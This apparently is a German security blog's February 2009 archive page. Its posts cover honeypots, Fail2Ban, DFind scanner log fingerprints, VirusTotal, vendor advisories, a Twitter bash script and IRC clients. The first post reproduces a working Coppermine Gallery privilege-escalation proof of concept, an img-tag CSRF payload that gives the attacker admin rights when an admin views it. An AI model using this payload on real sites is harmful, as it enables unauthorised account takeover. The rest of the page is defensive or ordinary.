Archive for Februar 2009

 
 

Coppermine Photo Gallery <= 1.4.20 (BBCode IMG) Privilege Escalation

+————————————————————————–+
| Coppermine Photo Gallery <= 1.4.20 (BBCode IMG) Privilege Escalation PoC |
+————————————————————————–+
| by Juri Gianni aka yeat – staker[at]hotmail[dot]it |
| http://coppermine-gallery.net |
| Don’t add me on msn messenger. |
| This vulnerability can be named as „bbcode img tag script injection“ |
+————————————————————————–+
| Proof of Concept (an example,to understand it) |
+————————————————————————–+
URL: http://[host]/[path]/delete.php?id=u[ID]&u[ID]=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no
[img]URL[/img] +————————————————————————–+
| Modify [ID] with your user id. |
| Go http://[host]/[path]/displayimage.php?album=random&pos=[album id] |
+————————————————————————–+
Insert the below code into a new message

hey admin,nice web site 🙂
[img]http://[host]/[path]/delete.php?id=u3&u3=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no[/img]

+————————————————————————-+
| The fake image doesn’t show errors,you’ll see „hey admin,nice web site“ |
| You’ll become admin when the real admin will visit the page |
+————————————————————————-+

APSA09-01 – Buffer overflow issue in versions 9.0 and earlier of Adobe Reader and Acrobat

Release date: February 19, 2009

Vulnerability identifier: APSA09-01

CVE number: CVE-2009-0658

Platform: All platforms

Summary:

APSA09-01 – Buffer overflow issue in versions 9.0 and earlier of Adobe Reader and Acrobat.

Cisco Security Advisory: Multiple Vulnerabilities in the Cisco ACE Application Control Engine Module and Cisco ACE 4710 Application Control Engine – Cisco Systems

FYI

Cisco Security Advisory: Multiple Vulnerabilities in the Cisco ACE Application Control Engine Module and Cisco ACE 4710 Application Control Engine – Cisco Systems.

www.VirusTotal.com/de/

Virustotal analysiert verdächtige Dateien und erleichtert die schnelle Erkennung von Viren, Würmern, Trojanern und jeglicher Art von Malware, welche von den Antivirus-Engines festgestellt werden.

Über VirusTotal

VirusTotal bietet einen Analysedienst für jegliche Typen von verdächtigen Dateien. Der Dienst ermöglicht eine schnelle Erkennung von Viren, Würmern, Trojanern und anderer Malware, welche von Anti-Virus Engines erkannt wird.

Merkmale:

  • Unabhängiger und kostenloser Dienst
  • Nutzen von mehreren Anti-Virus Engines
  • Automatische Updates von Virensignaturen in Echtzeit
  • Detailierte Ergebnisse von jeder Anti-Virus Engine
  • Globale Statistiken in Echtzeit

Senden der Dateien per email

Erstellen Sie eine neue E-Mail mit der Empfängeradresse scan@virustotal.com

  1. Als Betreff der E-Mail tragen Sie bitte SCAN ein.
  2. Hängen Sie die verdächtige Datei an die erstellte E-Mail an. Als Größenlimit sind 20 MByte festgelegt. E-Mails, welche diese Größe überschreiten werden vom System verworfen.
  3. Nach Analyse erhalten Sie sofort einen Bericht zum Dateiscan. Die Antwortzeiten des Systems hängen zum Zeitpunkt ihrer Analyseanfrage von der momentanen Auslastung unserer Serversysteme ab.

Twitter.com via shell aktualisieren

Hier ein Script welches euch hilft Twitter via „bash“ shell zu steuern.
Dieses Script überprüft auch, ob ihr nicht über 140 Zeichen eingegeben habt.

Das Script sollte selbsterklärend sein:

#!/bin/bash

# konfiguration
user=EUER-Twitter-Username
pass=Euer-Twitter-Passwort
# alias twitter_update =’pfad/zum/script/‘

# nachricht einlesen
clear
echo „——————————–“
echo „Biite Twitter-Nachricht eingeben“
echo „——————————–“
read input

# nur 140 Zeichen
if [ $(echo $input|wc -m) -gt 140 ]; then
echo ‚Zu lang!: ‚$(echo $input|wc -m)
echo ‚Bleib unter 140 Zeichen‘
exit 1
fi

curl –output „/tmp/twitter.tmp“ –user $user:$pass –data status=“$input“ http://twitter.com/statuses/update.xml

#delete the tmpfile
rm /tmp/twitter.tmp
clear
echo „Twitter Account Update“
echo „Neuer Status“ $input

Dieses Script kann man HIER downloaden

w00tw00t.at.ISC.SANS.DFind

Schon seit längerem sind in den (Apache-)Logs meiner Server einige seltsame Zeilen zu finden (Ursprungs-IP wurde unkenntlich gemacht):

xxx.xxx.xxx.xxx - - [30/Sep/2007:12:48:33 +0200] “GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1″ 400 395 “-” “-”

Diese Zeilen sind der Fingerprint von DFind, einem vulnerability Scanner, der den Server auf Schwachstellen durchsucht. Bei Symantec kennt man das Tool als “Hacktool.DFind” – dort ist auch eine Liste von Schwachstellen, auf die das Programm mögliche Opfer testet.

In letzter Zeit häufen sich Angriffsversuche von IP’s, die aus Adressbereichen von Hostern kommen.

Server Setup – Honeynet Aufbau

Ich habe mein Server Setup für mein Honeynet mal kurz beschrieben. Es handelt sich dabei um 2 vServer.
Diese sind nun knapp 48 Stunden online mit 2 Honeypot Systemen. Auch trudeln so langsam die erstem Ergebnisse ein, was mich sehr erstaunt.

Wenn es genug Daten sind, werde ich sie auch hier veröffentlichen.

Mehr Informationen zu den 2 Servern findest du HIER


Fail2Ban ein sexy ssh blocker

.:: Einleitung ::.

Fail2Ban durchsucht Logdateien wie /var/log/pwdfail oder /var/log/apache/error_log und blockt IP-Adressen, die zu viele fehlgeschlagene Loginversuche haben. Es aktualisiert Firewallregeln, um diese IP-Adressen zu sperren. Fail2Ban kann mehrere Logfiles lesen – beispielsweise die von sshd oder apache. Die IP-Adressen werden nach einer vorher festgelegten Zeitspanne wieder aktiviert.

Benötigt wird:

IPTABLES

python >= 2..

Desweiteren sichert Fail2Ban nicht nur Port 22 (SSH) ab, sondern noch weit aus mehr. (sshd, apache, qmail, proftpd, sasl, etc)

.: Installation :.

Da ich ein Debian System benutze ist die Installation sehr einfach über den Paketmanager zu erledigen:

$ sudo apt-get install fail2ban

Damit ist es im wesentlichen schon getan. Nun läußt Fail2Ban auf dem System.
Wichtig ist nun noch die Feinjustierung am Fail2Ban.

Die Fail2Ban Konfiguration ist relativ einfach. Es gibt nur ein Konfigurationsfile in dem Fail2Ban insgesamt konfiguriert wird. Die Datei befindet sich unter /etc/fail2ban.conf

Sie können jeden beliebigen Texteditor verwenden um die Datei zu bearbeiten: vim, emacs, joe, ae…

Die Datei muss als root editiert werden.

.: URL Sammlung :.

http://www.fail2ban.org/wiki/index.php/FAQ_german

http://blog.256bit.org/archives/383-fail2ban-und-der-Kampf-gegen-Trackback-Spam.html


Konsole = Irssi / GUI = Quassel | IRC Clients

Irssi ist ein freier IRC-Client auf Kommandozeilenbasis. Neben dem IRC-Protokoll wird mit Hilfe von Plugins auch SILC, ICB sowie ICQ und Jabber/XMPP unterstützt. Irssi ist unter der GPL lizenziert und läuft auf Unix und unixoiden Systemen, unter Microsoft Windows und auf Mac OS X.

So weit Wikipedia unter http://de.wikipedia.org/wiki/Irssi

Ich nutze es gerne als permanente IRC Verbindung, anstatt eines Bouncers. Da ich generess fast alles via Konsole mache bietet sich IRSSI förmlich an. Könnte ich diesen Blog via Konsole verwalten würde ich es warscheinlich machen.

Für alle die nicht so viel mit Konsolenbasierte IRC Clients am Hut haben, empfehle ich euch an anderes Tool.

Ein guter Freund von mir und seine Kollegen basteln gerade an einem Plattform unabhängigen IRC Client. (GUI 🙂 )

Eine Installationsanleitung bekommt ihr später.

Mehr Infos dazu findet ihr unter: Quassel-IRC

Kurzinfo zu Quassel-IRC:

Quassel IRC (kurz: Quassel) ist ein grafischer, verteilter IRC-Client. Er wird unter der GPL für Linux und andere Unix-Derivate, Microsoft Windows sowie Mac OS X veröffentlicht.“

vServer Mangel

Wenn man sich eingehender mit den Honeypots (Honig-Töpfen) beschäftigt, kommt man zwangsläufig zu dem Schluss ich brauche mehr Server bzw IPs.
Doch da dies auch weitere Kosten nach sich zieht sehe ich mich gezwungen, mit meinen begrenzten Ressourcen  sparsamer umzugehen. Ich habe zur Zeit 3 Honeypots Honig-Töpfe laufen, wobei einer davon noch nicht richtig konfiguriert ist. Es handelt sich dabei um einen „honeyd“ Server.
Ich muss mal beobachten in wie weit dieser Blog überhaupt angenommen wird 🙂 da ich es auch nicht wirklich schaffe jeden Tag etwas neues zu schreiben. Wenn ich sehe, dass der Blog angenommen wird, versuche ich mal ein wenig Werbung zu schalten. Dann dürft ihr alle kräftig auf die Links klicken, aber bitte ohne eure BOTS 🙂 könnte ärger mit Google geben.
Anderweitig könnt ihr mich auch kontaktieren. wenn ihr auch eigene Honig-Töpfe habt via „info()botnetzprovider.de“ () = @.
Für alle die keine Lust haben auf die Werbung zu klicken hier die einfache Variante via Paypal.